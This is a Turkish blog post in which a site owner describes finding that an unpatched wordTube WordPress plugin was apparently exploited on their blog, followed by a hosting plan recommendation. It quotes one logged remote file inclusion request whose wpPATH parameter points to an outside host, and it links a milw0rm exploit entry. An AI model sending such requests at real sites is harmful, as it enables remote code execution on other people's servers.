Wordtube Eklentisi Açığı, ResellerZoom UK Plan
Kullandığım reseller paketini değiştirdikten sonra günlük ve sitenin kurulumlarını yaptım. Ardından fantasticoda gezinirken son kullanıcılar sayfasını ziyaret ettim. Bu sayfada /gunluk//wp-content/plugins/wordtube/wordtube-button.php? wpPATH=http://coolpc.com.tw/evaluate/safe? verisi ile karşılaştım. Biraz araştırmadan sonra http://www.milw0rm.com/exploits/3825 sayfası ile karşılaştım. Bir açıktan kaynaklanıyormuş. Bir süre önce bu eklentiyi kurmuş ve denemiştim ama ardından beğenmeyip devre dışı bırakmıştım. Bir süre sanırım dosyalar bekledi. O sürede birisi açıktan faydalanmış gibime geliyor. Hatta bir klasöre index.html dosyası yerleştirilmişti. Büyük ihtimal bu açığı kullanarak yapmışlardı. Tabi açık bulunalı çok oluyor. Ben son kullanıcılar sayfasındaki garip veriyi gördükten sonra öğrenebildim.
Eğer ResellerZoom paketlerini kullanıyor ve sitelerinizde yavaşlık hissediyorsanız size UK/Euro paketlerinden birisini önerebilirim. Önceki pakete göre hız 2 kat artmış durumda. Bunun nedeni ise tabiki sunucunun Avrupa'da olması.
Tags: wordpress